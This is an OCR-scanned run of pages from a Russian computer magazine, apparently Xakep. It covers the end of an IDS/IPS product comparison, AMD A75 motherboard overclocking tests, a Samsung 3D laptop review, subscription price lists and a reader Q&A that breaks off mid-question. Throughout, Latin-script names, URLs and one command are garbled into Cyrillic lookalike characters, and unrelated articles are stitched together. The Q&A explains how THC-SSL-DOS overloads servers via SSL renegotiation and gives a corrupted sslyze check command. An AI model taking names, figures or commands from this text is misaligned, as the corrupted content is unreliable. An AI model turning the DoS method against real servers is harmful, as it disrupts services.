ѴРІ\І и т. д. и при необходимости блокировать их. Реализован мо- 
дуль ОІ_Р, отслеживающий попытки передачи конфиденциаль- 
ной информации и перемещения данных в защищаемой сети, что 
позволяет оценивать риски и блокировать утечку. По умолчанию 
распознается восемь типов данных (номера кредиток, телефо- 
ны...), остальную специфическую для организации информацию 
админ задает самостоятельно при помощи регулярных выраже- 
ний. В настоящее время большая часть уязвимостей приходится 
на веб-приложения, поэтому в продукт ІВМ входит специальный 
модуль ѴѴеЬ Арріісаііоп Зесигііу, который защищает системы 
от распространенных видов атак: ЗОИ іщесііоп, ЮАР іщесііоп, 
Х55, Э50ІМ Ьдаскіпд, РНР ПІе-і псіисіегз, С5РР и т. д. 

Предусмотрено несколько вариантов действий при обнару- 
жении атаки — блокировка хоста, отправка предупреждения, 
запись трафика атаки (в файл, совместимый с Ісрбитр), поме- 
щение узла в карантин, выполнение настраиваемого пользова- 
телем действия и некоторые другие. Политики прописываются 
вплоть до каждого порта, ІР-адреса или зоны ѴІ_АІМ. Режим Н ід Ь 
АѵаіІаЬіІіІу гарантирует, что в случае выхода из строя одного 
из нескольких устройств ІР5, имеющихся в сети, трафик пойдет 
через другое, а установленные соединения не прервутся. Все 
подсистемы внутри железки — РАЮ, блок питания, вентилятор 
охлаждения — дублированы. Настройка, производящаяся при 
помощи веб-консоли, максимально проста (курсы обучения 
длятся всего один день). При наличии нескольких устройств 
обычно приобретается ІВМ Зесигііу ЗіІеРгоІесІог, который обе- 
спечивает централизованное управление, выполняет анализ 
логов и создает отчеты. 



ГДЕ РАЗВЕРНУТЬ Ю5/ІР5? 



Чтобы максимально эффективно использовать Ш5/ІР5, нужно 

придерживаться следующих рекомендаций: 

• Систему необходимо разворачивать на входе защищаемой сети 
или подсети и обычно за межсетевым экраном (нет смысла 
контролировать трафик, который будет блокирован) — так мы 
снизим нагрузку. В некоторых случаях датчики устанавливают 
и внутри сегмента. 

• Перед активацией функции ІР5 следует некоторое время 
погонять систему в режиме, не блокирующем Ш5. В дальнейшем 
потребуется периодически корректировать правила. 

• Большинство настроек ІР5 установлены с расчетом 

на типичные сети. В определных случаях они могут оказаться 
неэффективными, поэтому необходимо обязательно указать ІР 
внутренних подсетей и используемые приложения (порты). Это 
поможет железке лучше понять, с чем она имеет дело. 

• Если ІР5-система устанавливается «в разрыв», необходимо 
контролировать ее работоспособность, иначе выход устройства 
из строя может запросто парализовать всю сеть. 




Консоль управления БІопеСаІе ІР5 



МСАРЕЕ ИЕТѴѴОРК 5ЕСІІРІТѴ РІ_АТЕОРМ 7 



Разработчик: МсА^ее Іпс. 

ѴѴеЬ: ѵтѵѵ.тсаіее.сот . 

Реализация: программно-аппаратная. 

Лицензия: коммерческая. 

ІпІгиВЫеІсІ ІР5, выпускавшийся компанией МсА(ее, в свое время 
был одним из популярных ІР5-решений. Теперь на его основе раз- 
работан МсА(ее ІМеІѵѵогк Зесигііу РІаНюгт 7 (І\І5Р). В дополнение 
ко всем функциями классического N I Р5 новый продукт получил 
инструменты для анализа пакетов, передаваемых по внутренней 
корпоративной сети, что помогает обнаруживать зловредный 
трафик, инициируемый зараженными компами. В МсА(ее ис- 
пользуется технология (ЗІоЬаІ ТЬгеаІ ІпІеІІідепсе, которая собирает 
информацию с сотен тысяч датчиков, установленных по всему 
миру, и оценивает репутацию всех проходящих уникальных фай- 
лов, ІР- и ІІРІ_-адресов и протоколов. Благодаря этому І\І5Р может 
обнаруживать трафик ботнета, выявлять Обау-угрозы и 00о5- 
атаки, а такой широкий охват позволяет свести к нулю вероятность 
ложного срабатывания. 

Не каждая Ю5/ІР5 может работать в среде виртуальных машин, 
ведь весь обмен происходит по внутренним интерфейсам. Но І\І5Р 
не испытывает проблем с этим, он умеет анализировать трафик 
между ѴМ, а также между ѴМ и физическим хостом. Для наблюде- 
ния за узлами используется агентский модуль от компании РеЛех 
Зузіетз, который собирает информацию о трафике в ѴМ и передает 
ее в физическую среду для анализа. 

Движок различает более 1100 приложений, работающих 
на седьмом уровне 051. Он просматривает трафик при помощи ме- 
ханизма контент-анализа и предоставляет простые инструменты 
управления. 

Кроме ІМІР5, МсАІюе выпускает и хостовую ІР5 — Нозі I пігизіоп 
Ргеѵепііоп (ог йезкіор, которая обеспечивает комплексную защиту 
ПК, используя такие методы детектирования угроз, как анализ 
поведения и сигнатур, контроль состояния соединений с помощью 
межсетевого экрана, оценка репутации для блокирования атак. 



ЗАКЛЮЧЕНИЕ 



Победителей определять не будем. Выбор в каждом конкретном 
случае зависит от бюджета, топологии сети, требуемых функций 
защиты, желания админа возиться с настройками и, конечно же, 
рисков. Коммерческие решения получают поддержку и снабжаются 
сертификатами, что позволяет использовать эти решения в орга- 
низациях, занимающихся в том числе обработкой персональных 
данных Распространяемый по ОрепЗоигсе-лицензии 5погІ пре- 
красно документирован, имеет достаточно большую базу и хоро- 
ший послужной список, чтобы быть востребованным у сисадминов. 
Совместимый с ним Бигісаіа вполне может защитить сеть с боль- 
шим трафиком и, главное, абсолютно бесплатен. □С 
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ЗАИРУ ВКЮѲЕ 

ТРУБА ШАТАЛ 



ТЕСТИРОВАНИЕ МАТЕРИНСКИХ 
ПЛАТ НА БАЗЕ ЧИПСЕТА АМР А75 



Ассимиляция! Пожалуй, этим заумным 
словом можно охарактеризовать потуги Іпіеі 
и АМй выпустить кремниевое устройство «всё 
в одном». И если у первых графика, как всег- 
да, хромает на обе ноги, то у «красных» кишка 
тонка тягаться со своим конкурентом в сфере 
х86-приложений. 

В сегодняшнем тесте ты познакомишься 
с достаточно дорогими моделями, пропа- 
гандирующими не только оверклокинг, но и, 
например, массивы видеокарт. В связке 
с АІѴЮ І_Іапо можно использовать технологию 
АМй ОиаІ ОгарЫсз, а в некоторых случаях 
и полноценный дуэт графических адаптеров, 
объединенных в СгоззРігеХ. Правда, в плане 
«обычной» производительности, то есть 
в х86-приложениях, АМй І_Іапо уступает Іпіеі 
Вапсіу Вгісіде. И тем не менее, хороший раз- 
гонный потенциал позволяет собрать на базе 
процессора АМй А8/А6 шуструю игровую 
машинку. 



Особняком в нашем тесте стоит материн- 
ская плата АВІІВ Р1А75-Ѵ РРО. Компания- 
производитель не постеснялась и буквально 
навешала на свое устройство всякого рода 
фенечки: от абсолютно бесполезных до реаль- 
но крутых! Чуть забегая вперед, скажем, что 
для создания достаточно производительного 
десктопа на «маме» лучше не экономить. 

О каких же деньгах тут идет речь? Если 
верить ресурсу «Яндекс Маркет», то на мо- 
мент написания статьи топовый камень АМй 
А8-3850 стоил 4000 рублей. Столько же стоит 
материнская плата. За набор оперативной 
памяти объемом 4 Гб и частотой 2400 МГц 
(о том, почему мы рекомендуем память с часто- 
той именно 2400 МГц, читай далее) придется 
выложить порядка 7000 рублей. Остальные 
комплектующие — по вкусу. В итоге за связку 
процессор-плата-память придется отдать 
порядка 15 000 рублей. Согласись, не так уж и 
много за топое железо! 



іИ4Ы:ЦІ:ИН!І'Н 

Процессор: АМй А8-3850, 2,9 ГГц 
Кулер: ЗсуЩе ИІШАЗ 
Оперативная память: Согзаіг 
СМ6ТХ7 02400 МГц, 1x4 Гб 
550: Кіпдзіоп 5ѴР1 00 ЕБ2/646, 

64 Гб 

Блок питания: НІРЕВ ТУРЕ К1000, 
1000 Вт 

ОС: ѴѴіпсІоѵѵз 7 Максимальная 
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А5К0СК А75 РК04 



И 



так, мы начинаем. Первой по алфавиту идет материнская пла- 
та АЗРоск А75 Рго4. Перед нами сразуже предстает топовое 
устройство! Об этом красноречиво свидетельствует наличие 
таких оверклокерских фишек, как кнопки запуска/перезагрузки си- 
стемы и обнуления настроек ВІ05. Вообще, на базе «четвертой» никто 
не помешаеттебе собрать достаточно производительный десктоп. 

Правда, с разгоном у нас дела как-то не заладились. Все попытки 
поднять шину выше отметки 105 МГц закончились «выпадением» 5АТА- 
контроллера. В итоге система вроде бы работала стабильно (по край- 
ней мере в ВІ05), но зайти в операционную систему не получалось. 

Попытки разогнать «камень» и память с помощью функции Е1 ОС 
Мосіе также провалились. Для тех, кто не в курсе, поясним: теорети- 
чески достаточно клацнуть в ВІОЗ'е всего один раз, чтобы разогнать 
СРІІ до 3300/3400/3500/3600 МГц и «мозги» до 2000/2200/2500 МГц. 

Но не тут-то было! Не сра-бо-та-ло! Перепрошивка ВІ05 до версии 1.80 
никаких дивидендов не принесла. В общем, очевидно, что прошивка 
АЗРоск А75 Рго4 оставляет желать лучшего. Остается лишь надеяться, 
что со временем эта проблема будет решена. 





А5Р0СКА75 

ЕХТКЕМЕ6 



К 



ак говорится, первый блин комом. Посмотрим, что удастся 
выжать из АЗРоск А75 Ехігетеб. Вообще, линейка Ехігетеб 
является гордостью тайваньской компании. В недалеком 
прошлом мы уже изучали материнские платы на базе чипсета Іпіеі 
Р67 Ехргезз. Настало время АМй. Прошли те времена, когда с АЗРоск 
ассоциировались исключительно бюджетные решения. Но с топового 
продукта и спрос соответствующий. Материнская плата АЗРоск А75 
Ехігетеб в своем роде уникальна: на текстолите распаяно сразу три 
порта РСІ Ехргезз хіб. Правда, в случае использования массива видео- 
карт СгоззРігеХ работать они будут по схеме х8 + х8 + х4. 

В плане разгона АЗРоск А75 Ехігетеб оказалась пошустрее «прош- 
ки». Однако скажем сразу: нам не удалось достичь даже показателей 
чуть выше среднего. После увеличения частоты шины до 112 МГц 
процессор с частотой 112 х 29 = 3248 МГц, а память — 112 х 18,66=2089,92 
МГц. Функция Е 1 ОС Мосіе также оказалась абсолютно бесполезной. 



Плюс на базе АМй Ыапо можно собрать медиа- 
центр любой сложности. В общем, с АМй Ыапо 
не соскучишься — он предоставляет обширный 
простор для творчества. 

МЕТОДИКАТЕСТИРОВАНИЯ 

Опять возвращаемся к разгону. Удивительно 
приятно осознавать, что оверклокинг платы су- 
щественно повышает производительность всей 
системы. За счет набора множителей процессо- 
ра и оперативной памяти разгон «мам» по шине 
дают колоссальный эффект. Так, графический 



кластер АМй Ыапо буквально преображается 
и из гадкого утенка в великолепного лебедя. 

Не так давно компания 6ІСАВУТЕ представила 
ролик, в котором было показано, как на маши- 
не с процессором АМй А8-3850, разогнанным 
до 3600 МГц, преспокойно играют в Сгузіз 2. 
Повторим, в Сгузіз 2! Мы решили последовать 
примеру инженеров тайваньской компании 
и установить рамку. Оценку «отлично» получали 
те платы, при использовании которых удава- 
лось спокойно играть в Сгузіз 2 с разрешением 
1920 х 1080 точек и максимальном качестве гра- 



фики, но в среде йігесіХ 9. «Отлично» — озна- 
чает не меньше 25 РР5. При этом выставлялись 
максимальные множители памяти и процессо- 
ра. Для более полного анализа мы воспользо- 
вались финским бенчмарком ЗйМагк Ѵапіаде 
и выбрали режим теста регіюгтапсе. Наконец, 
после тестирования на игровых приложениях 
мы снижали множители «камня» и памяти 
и определяли максимальный потолок частоты 
шины у материнских плат, которого удалось до- 
стичь при воздушном охлаждении. Все резуль- 
таты заносились в сводные диаграммы. 
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РЕККІІМ 



А51І5 Р1А75-І ОЕІЛІХЕ 



И 



нтересныи концепт материнском платы представила компа- 
ния А51І5. Устройство Р1А75-І йеіихе выполнено в формфак- 
торе Міпі-ІТХ и при этом оснащено полноценным слотом РСІ 
Ехргезз хіб. Из-за габаритов остальным слотам места не нашлось. 

Но горевать не стоит. Слово йеіихе в названии текстолитового гаджета 
говорит о поддержке беспроводных технологий ѴѴі-Рі и ВІиеІооіИ. 

В общем, А51І5 Р1А75-І йеіііхе — идеальный вариант для тех, кто хочет 
собрать НТРС в микроскопическом корпусе. Удивительное рядом: эту 
плату оснастили вполне боеспособными функциями разгона. Хорошо 
знакомый ІІЕРІ ВІ05 великолепно оптимизирован. Благодаря этому 
наша крошка выдала на-гора 118 МГц по шине. После такого раз- 
гона процессор заработал на частоте 118 х 29 = 3422 МГц, а память — 
на частоте 118 х 18,66 = 2201,88 МГц. Большего достичь в любом случае 
не удастся. Хотя бы потому, что на процессор не получится установить 
мощный габаритный кулер. Он либо не влезет, либо перекроет опера- 
тивную память и слот РСІ Ехргезз хіб. С другой стороны, такой кулер, 
как, например, БсуіЬе Від 5Ь игікеп, позволит одновременно охлаж- 
дать и процессор, и память, и подсистему питания материнской платы. 





м 



атеринская плата А51І5 Г1А75-Ѵ РРО уже гостила в нашей 
тестовой лаборатории. Нетакдавнов рубрике «Разгон» 
именно она служила путеводной звездой во время пробного 
разгона АМй Ыапо. И, надо признаться, показала себя только с лучшей 
стороны! В этот раз нам удалось стабильно работать на частоте шины 
140 МГц. При такой частоте тактового генератора процессор может 
работать с частотой 140 х 29 = 4060 МГц, а память — с частотой 140 х 
18,66=2612,4 МГц. Но, к сожалению, в первом случае воздушная систе- 
ма охлаждения не справилась с разгоряченным «камнем». В случае 
с ОЗУ нужно еще постараться найти такой кит. В итоге нам пришлось 
снизить частоту шины и проходить тесты при меньших показателях 
«камня» и памяти. Тем не менее, рубеж 25 ГР5 в Сгузіз 2 был пройден! 
Как мы и обещали, плата получает оценку «отлично». 

Для тех, кому подобная прыть от АМй Ыапо покажется недо- 
статочной, предусмотрена поддержка двух слотов РСІ Ехргезз хіб, 
работающих согласно схеме хіб + х4. Также ты можешь рассчитывать 
на парочку РСІ Ехргезз хі и трио РСІ. Эквивалентный функционал 
в совокупности с большим количеством 5АТА- и ІІ5В-портов послед- 
них поколений превращает материнскую плату А51І5 Г1А75-Ѵ РРО 
в универсальное устройство. 




Сокет: 

Память: 

Слоты расширения: 

Дисковые контроллеры: 
Аудио: 

Сеть: 



РМ1 

1066-2400 МГц 

1х РСІ Ехргезз хіб, 1х РСІ Ехргезз х4, 2х 
РСІ Ехргезз хі, Зх РСІ 
5х 5АТА 3.0 

7.1 СИ НО РеаІІек АІ.С892 

РеаІІек РТІ.8111Е, 10/100/1000 Мбит/с 



РМ1 

1066-2400 МГц 

1 х РСІ Ехргезз хіб, 1х РСІ Ехргезз х8, 1х РСІ 
Ехргезз х4, 1х РСІ Ехргезз хі, Зх РСІ 
8х 5АТА3.0 

7.1 СН НО РеаІІек АІ.С892 

РеаІІек РТІ_8111Е, 10/100/1000 Мбит/с 



ГМ1 

1066-1866 МГц 
1х РСІ Ехргезз хіб 
5х 5АТА 3.0 

7.1 СН НО РеаІІек АІ.С892 
РеаІ*екРТІ_8111Е, 10/100/1000 Мбит/с; ѴѴі-Рі 
802.11 Ь/д/п 



Разъемы на задней панели: 



1 х Ц-5иЬ, 1 х ЦѴІ, 1 х НйМІ, 4х 115В 3.0, 2х 
115В 2.0, 1х е5АТА, 1х РігеѴѴіге, 1х 5/РОІР, 
1х Р-І-45, 1х Р5/2, бхаибіо 



1 х й-5иЬ, 1 х т, 1 х НйМІ, 4х 115В 3.0, 2х 115В 2.0, 1х ОізрІауРог*, 1х ОѴІ, 1х НОМІ, 2х 115В 3.0, 4х 
1х е5АТА, 1 х РігеѴѴіге, 1х 5/РОІР, 1х Рб-45, 1х 05В 2.0, 1х е5АТА, 1х РігеѴѴіге, 1х 5/РОІР, 1х Р_І- 
Р5/2, 6х аибіо 45, 1х Р5/2, 1х ВІиеІооіН, Зх аибіо 



Формфактор: 



АТХ 



АТХ 



Міпі-ІТХ 
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ак получилось, что в сегодняшнем тесте участвовал всего 
один продукт компании М5І. Материнская плата М5І 
А75МА-055 может постоять за себя, ведь на страже стабиль- 
ности устройства, да и всей системы, стоит технология Мііііагу СІазз 
II. Конечно, маркетологи наверняка постарались выставить всё в 
ярком свете. Но в то же время тяжело отрицать эффективность япон- 
ских твердотельных конденсаторов и высококачественных элементов 
питания. При этом цена М5І А75МА-055 весьма демократична. 

Идем дальше. ВІ05 материнской платы М5І А75МА-055, как пацан- 
чик из Южного Бутово, четкий. Здесь нет расплывчатых понятий. Если 
и можно поднять частоту шины, то лишь до 128 МГц. Если и можно 
поднять напряжение, то только на определенную величину, причем 
не очень большую. В итоге уже чисто визуально заметно, что в плане 
оверклокинга много из этой платы не выжмешь. Тем не менее, 115 МГц 
на шине мы получили. Процессор заработал на частоте 115 х 29 = 3335 
МГц, а память — на частоте 115 х 18,66 = 2145,9 МГц. 



6ЮАВУТЕ 6А-А75М-02Н 



М5І А75МА-655 



СНИМИДЯДЬКАЧЕРНОМОР 

Вот парадокс: все устройства, которые мы 
тестировали, наверняка найдут своего покупа- 
теля, хотя у нас и было к ним много претензий. 

В оправдание производителей можно сказать, что 
со временем, после пары-тройки перепрошивок 
ВІ05, всё устаканится. Нам же остается раздать 
награды. За великолепную производительность 
и замечательный оверклокерский потенциал 
приз «Выбор редакции» достается материнке 



РМ1 

1066-2250 МГц 

1х РСІ Ехргезз х16, 1х РСІ Ехргезз х4, 
2х РСІ Ехргезз хі, Зх РСІ 
7х БАТА 3.0 

7.1 СИ Нй РеаІІек АІ.С892 

РеаІІек РТІ_8111Е, 10/100/1000 Мбит/с 



РМ1 

1066-2400 МГц 

1х РСІ Ехргезз х16, 1х РСІ Ехргезз х4, 
1х РСІ Ехргезз хі, 1х РСІ 
6х БАТА 3.0 

7.1 СИ НЦ РеаІІек АІ.С889 

РеаІІек РТІ_8111Е, 10/100/1000 Мбит/с 



ГМ1 

1066-1600 МГц 

1х РСІ Ехргезз х16, 1х РСІ Ехргезз х4, 1х 
РСІ Ехргезз хі, 1х РСІ 
6х БАТА 3.0 

7.1 СИ Нй РеаІІек АЮ887 

РеаІІек РТІ_8111Е, 10/100/1000 Мбит/с 



6І6АВУТЕ 6А- 
А75М-02Н 



М5І А75МА-655 



ознакомимся с материнской платой 0ЮАВУТЕ 0А-А75М-О2Н. 

Как видно по картинке, перед нами устройство формфактора 
тАТХ. Во многом из-за этого инженерам тайваньской компании 
пришлосьуменьшить число слотов БІММ до двух. Но порты для ОЗУ рас- 
положены настолько близко к процессорному гнезду, что при использо- 
вании габаритного кулера башенного типа киты попросту не поместятся. 

В ходе тестирования нам пришлось снимать систему охлаждения с кита 
оперативки. Поэтому советуем внимательно отнестись к выбору системы 
охлаждения СРІІ. Вторым недостатком разводки 010АВУТЕ 0А-А75М-О2Н 
мы считаем распаянные 5АТА-коннекторы. Но он проявится только при 
использовании габаритной видеокарты. В остальном к столь миниа- 
тюрной плате претензий по разводке нет. Назовите автора этой статьи 
старомодным, но какже приятно работать с прежним ВІОЗ'ом от АѵѵагсІ. 
Привычный голубой экран, привычное меню М.І.Т. и никакой поддержки 
мыши! Это, возможно, совпадение, но именно бюджетная материнская 
плата 010АВУТЕ 0А-А75М-О2Н с таким ВІОЗ'ом продемонстрировала 
достаточно неплохие результаты разгона. И это при наличии скромных 
по сегодняшним меркам пяти фаз питания СРІ). При увеличении частоты 
шины до 128 МГц«камень» заработал с частотой 128x28 = 3584 МГц, а 
память — с частотой 128 х 18,66 = 2388,5 МГц. Максимальная частота шины 
достигала 134 МГц. 



А51І5 Р1А75-Ѵ РРО. Плата 010АВУТЕ 0А-А75М-О2Н 



1х Ц-5иЬ, 1х ЦізрІауРог*, 1х ЦѴІ, 
ІхНЦМІ, 4x115В 3.0, 2x115В 2.0, 1х 
еБАТА, 1 х ГігеѴѴіге, 1х Б/РйІГ, 1х Р.І- 
45, 1х Р5/2, 6х аибіо 
АТХ 



Іхй-БиЬ, ІхйѴІ, ІхНОМІ, 2х 115В 3.0, 
4х 115В 2.0, 1х Б/РйІГ, 1х Р.І-45, 1х 
Р5/2, Зхаисііо 

тАТХ 



1 х й-БиЬ, 1 х ПѴ\, 1 х НОМІ, 2х 115В 3.0, 4х 
115В 2.0, 1х Р.І-45, 1х Р5/2, 6х аибіо 

тАТХ 



при полном отсутствии конкурентов «загребает» 
титул «Лучшая покупка». Также хочется отметить 
материнскую плату 010АВУТЕ 0А-А75-1Ю4Н за ее 
уникальные способности в области разгона про- 
цессора и оперативной памяти, ц-ц 
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Размер экрана: 17.3", 1920x1080 точек 
Процессор: Іпіеі Соге І5-2410М, 2.4 ГГц 

Оперативная память: ОйРЗ-ІЗЗЗ, 6 Гб 
Видеоплата: АМй Расіеоп 6650М, 2 Гб 
Жесткий диск: 500 Гб 
Сетевые возможности: ОідаЬіІ І_АІМ, 
ѴѴі-Рі , ВІиеІооіН 3.0 
Дополнительно: ЗЦ-очки 
Операционная система: ѴѴіпсІоѵѵз 7 х64 
Габариты: 415. 8x276. 1x32. Зх 37.9 мм 
Вес: 2.9 кг 



РЕЗУЛЬТАТЫ ТЕСТИРОВАНИЯ: 



ѴѴіпКАК: 2369 Кб/с 
ЗирегРі (16М):330 с 
РСМагк'05: 8788 баллов 

30МагкѴапІаде:4431 балла 
Резісіепі ЕѵіІ 5: 59 РРБ 
СаІІ оПиагег: 21.5 РР5 
АІіеп Ѵ5 Ргесіаіог: 13 РР5 
Неаѵеп йгадоп: 12 РР5 
ВаНегу Еаіег: 67 минут 




5АМ51ІЫ6 РР712-501 



УНИВЕРСАЛЬНЫЙ НОУТБУК ДЛЯ РАЗВЛЕЧЕНИЙ! 



Сегодняшние ноутбуки практически ни в чем 
не уступают своим настольным собратьям. 

И это факт. Они собраны из мощных компо- 
нентов, позволяющих запускать новейшие 
игровые хиты. Они практичны и удобны в ис- 
пользовании. Кроме того в лэптоп подчас куда 
легче внедрить какую-нибудь интересную тех- 
нологию. Например, ноутбук Затзипд РР712 
может, помимо всего вышеперечисленного, по- 
хвастаться еще и возможностью работы с 30! 



МЕТОДИКА ТЕСТИРОВАНИЯ 



Для проверки того, на что способен этот 
мобильный компьютер, мы применили нашу 
специально разработанную для таких случаев 
методику. Она состоит из трех групп программ 
— тех, которые вычисляют производитель- 
ность связки процессор-память, синтети- 
ческих бенчмарков и настоящих игровых 
приложений. В первую группу вошли тест, 
встроенный в архиватор ѴѴіпРАР, и утилита 
5ирег Рі. Вторая представлена продуктами 
Еиіигетагк: РСМагк‘05 и ЗйМагк Ѵапіаде. А в 
игровую группу вошли тесты Резісіепі ЕѵіІ 5, 
СаІІ о{ Зиагег, АІіеп Ѵз. Ргесіаіог и Неаѵеп. Они 
запускались с параметрами по умолчанию 



и разрешением 1280x1024 точек. Время работы 
от батареи проверялось с помощью утилиты 
Ваиегу Еаіег- режим «классический». 



ПЕРВОЕ ЗНАКОМСТВО 



Модель Затзішд РЕ712 выглядит солидно 
и внушительно, но при этом не производит впе- 
чатления скучного ноутбука. У него симпатич- 
ный, современный дизайн. На наш взгляд очень 
удачно выполнена подсветка клавиш. Допол- 
няет общее позитивное впечатление большой 
дисплей. О нем стоит рассказать особо, так как 
производитель позиционирует его как «самый 
яркий ноутбучный дисплей в мире». Кроме того, 
одев идущие в комплекте 30-очки и, запустив 
соответствующую игру или фильм, ты получишь 
трехмерную картинку. Думаем, про актуаль- 
ность 30 лишний раз напоминать не стоит. 

Вообще же, Затзішд РР712 оснащен практи- 
чески всеми новейшими технологиями. Куслу- 
гам пользователя будет доступен: ѴѴі-РІ стандар- 
та 801 .1 1 п, привод Віи-Рау, 115В 3.0 и ВІиеІооіЬ 
3.0. Ну а про современное «железо» и говорить 
нечего . Все тесты производительности Затзипд 
РР71 2 завершил с весьма хорошими результата- 
ми, на нем можно как комфортно работать, так 



и играть в любые современные игры. Спасибо 
процессору Іпіеі Соге І5-2410М и дискретной 
видеокарте АМР Расіеоп 6650М. 



И ЕЩЕ НЕМНОГО 



Как и у других устройств от Затзипд, у моде- 
ли РР712 есть много дополнительных фишек. 
Некоторые из них не только весьма интересны, 
но и полезны. Например, возможность подза- 
рядки различных мобильных ІІ5В-устройств 
от соответствующего порта компьютера, даже 
если он выключен. Или вот функция ускорен- 
ного выхода из спящего режима. Несомненно, 
к приятным моментам относится и весьма 
солидный набор программного обеспечения, 
который идет с Затзипд РР712 в комплекте 
поставки. 



ВЫВОДЫ 



Ноутбук Затзішд РР712 получился очень 
интересным. Он под завязку набит новейши- 
ми технологиями, современным «железом» 
и прочими вкусностями. Да, пожалуй, перед 
тобой действительно идеальный ноутбук для 
развлечений. Осталось проверить, готов ли 
попкорн в микроволновке! НС 
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8Ж 



6 номеров — 1110 руб. 
13 номеров — 1999 руб. 



6 номеров — 1110 руб. 
13 номеров — 1999 руб. 



ідтеНапй 

ПОДПИШИСЬ! 

зііор.діс.ги 

Редакционная подписка без посредников — 
это гарантия получения важного для Вас 
журнала и экономия до 40% от розничной 
цены в киоске 

8-800-200-3-999 
+7 (495) 663-82-77 (бесплатно) 




6 номеров — 564 руб. 

1 3 номеров — 1105 руб. 



6 номеров — 1110 руб. 
13 номеров — 1999 руб. 



6 номеров — 810 руб. 
13 номеров — 1499 руб. 



6 номеров — 1110 руб. 
13 номеров — 1999 руб. 




6 номеров — 630 руб. 

1 3 номеров — 1140 руб. 



6 номеров — 895 руб. 
13 номеров — 1699 руб. 



6 номеров — 1194 руб. 
13 номеров — 2149 руб. 



6 номеров — 894 руб. 

1 3 номеров — 1 699 руб. 










6 номеров — 690 руб. 
13 номеров — 1249 руб. 



6 номеров — 775 руб. 
13 номеров — 1399 руб. 



6 номеров — 950 руб. 

1 3 номеров — 1 699 руб. 



6 номеров — 810 руб. 

1 3 номеров — 1 499 руб. 











ІЖІТБ/РАСНІМТЕВ 



Степан Ильин (іѵѵІіиег.сот/зІераЫ 



РАО ІІпіІесІ 

ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НА РАО(аКЕАЬ.ХАКЕР.Ки 




□ ПОСЛЕДНЕЕ ВРЕМЯ ВСЕ ЧАЩЕ 
ГОВОРЯТ О ПЕРЕХВАТЕ ДАННЫХ, 
КОТОРЫЕ ПЕРЕДАЮТСЯ НЕ ТОЛЬКО 
ПО 55І_ (КСТАТИ, СПАСИБО ВАМ 
ЗА КЛАССНЫЕ МАТЕРИАЛЫ В #11/11 
НОМЕРЕ), НО И НА САМ 55Б-ДЕМ0Н. ЕСТЬ 
ДАЖЕ УТИЛИТА ТНС-55Б-Р05 ( ѴѴѴѴѴѴ.ТНС. 
0Р6/ТНС-55І--Р05 ) ДЛЯ ВЫЗОВА ОТКАЗА 
В ОБСЛУЖИВАНИИ. В ЧЕМ СОЛЬ? ВЕДЬ 
ТНС ФИГНЮ НЕ РЕЛИЗИТ! 

□ Идея вызвать РРо5 ЗЗЬ-демона довольно 
проста. Суди сам: установка защищенно- 
го ЗЗЬ-соединения требует на сервере в 15 раз 
больше ресурсов, чем на клиенте. Соответ- 
ственно, ТНС-55І_-Р05 ( уѵ\л/\л/.1бс.огдЛбс-55І-сІ05 ) 
использует эту пропорцию, чтобы вызвать отказ 
в обслуживании. На деле используется всего 
один ТСР-пакет, чтобы начать процесс 55І_ 
ЬапсІзЬакез с сервером. Та версия утилиты, 
которая доступна в паблике, может вызвать 
РРо5 тех сервисов, которые поддерживают 
установку соединения со стороны клиента 
(сІіепІ-іпШаІесІ гепедоЛаЛопз). Выяснить это 
можно с помощью другой утилиты ззіуге ( сосіе. 
доодІе.сот/р/зБІѵге ): 

руѣііоп ББІуіе.ру --гепе§ ѵ\Мл/.5егѵег.сот:443 

Если в графе напротив сІіепЫпіЛаІесІ 
гепедоЛаЛопз будет значение Нопогеб, значит, 
сервис уязвим. По словам разработчиков, 
сегодня проблема затрагивает все реализа- 
ции 55І_ (хотя известно о ней еще с 2003 года). 



Если это так, то уязвимы и те сервисы, которые 
поддерживаюттак называемую процедуру 
Зесиге РепедоЛаЛоп, однако, в паблике экс- 
плоита нет. Утилита ззіуге выполняет также 
несколько других проверок уровня безопас- 
ности 55І_: позволяет выявить использование 
слабых шифров, определяет версию протокола 
(55І_ѵ2, 55І_ѵЗ и ТІ_5ѵ1) и проводит валидацию 
сертификата. 

ЧИТАЛ ГДЕ-ТО, ЧТО ВИНЧЕСТЕРЫ 
ДЛЯ СЕРВЕРОВ ДЕЛАЮТСЯ БОЛЕЕ 
НАДЕЖНЫМИ (СНИЖЕННАЯ СКОРОСТЬ 
ВРАЩЕНИЯ ДИСКОВ, БОЛЕЕ СТРОГАЯ 
ПРОВЕРКА НА ВСЕХ ЭТАПАХ 
ПРОИЗВОДСТВА И Т. Д.). ВОПРОС: А ЕСТЬ 
ЛИ В ПРОДАЖЕ ВНЕШНИЕ НАКОПИТЕЛИ 
НА 2,5-ДЮЙМОВЫХ ВИНЧЕСТЕРАХ 
(ПРЕДНАЗНАЧЕННЫХ ДЛЯ СЕРВЕРОВ) 

ИЛИ ЖЕ В СЕРВЕРАХ ИСПОЛЬЗУЮТСЯ 
ТОЛЬКО 3,5-ДЮЙМОВЫЕ ЖЕСТКИЕ 
ДИСКИ? 

□ Среди жестких дисков формфактора 

2,5 м , в отличие от 3,5-дюймовых жестких 
дисков, производители не выделяют модели 
повышенной надёжности. Серверные диски 
формфактора 2,5 м существуют, как и корзины 
под них, но все они относятся к типу 5А5 (ЗегіаІ 
АиасЬесІ 5С5І) и немного толще обычных. 
Получить 2,5-дюймовый серверный ЗАТА-диск 
можно, взяв НРР семейства ѴѴезІегп Рідііаі 
ѴеІосіРарІог, который представляет собой 
3,5-дюймовый радиатор с прикреплённым 



к нему 2,5-дюймовым диском, и отсоединить 
сам диск. При этом могут возникнуть пробле- 
мы с перегревом. И хотя практический опыт 
показывает, что отдельные экземпляры могут 
продолжительное время нормально работать 
без радиаторов, помни, что ты делаешь это 
на свой страх и риск и дополнительное 
охлаждение всё-таки желательно. К слову, 
о дисках повышенной надёжности. Специали- 
сты по восстановлению данных не зафиксиро- 
вали более-менее заметной повышенной 
надёжности у 3,5-дюймовых дисков, которые 
позиционируются производителями какдиски 
повышенной надёжности. 

ВЫ УЖЕ ДОВОЛЬНО МНОГО ПИСАЛИ 
ПР0 3Л0ВРЕД, КОТОРЫЙ 
ПРОПИСЫВАЕТ СЕБЯ В ѴѴІ N 00ѴѴ5- 
СИСТЕМЫ. В БОЛЬШИНСТВЕ СЛУЧАЕВ Я 
ПРЕДСТАВЛЯЮ, ГДЕ ИСКАТЬ СЛЕДЫ 
МАЛВАРИ. НО ВОТ ГДЕ МОЖЕТ 
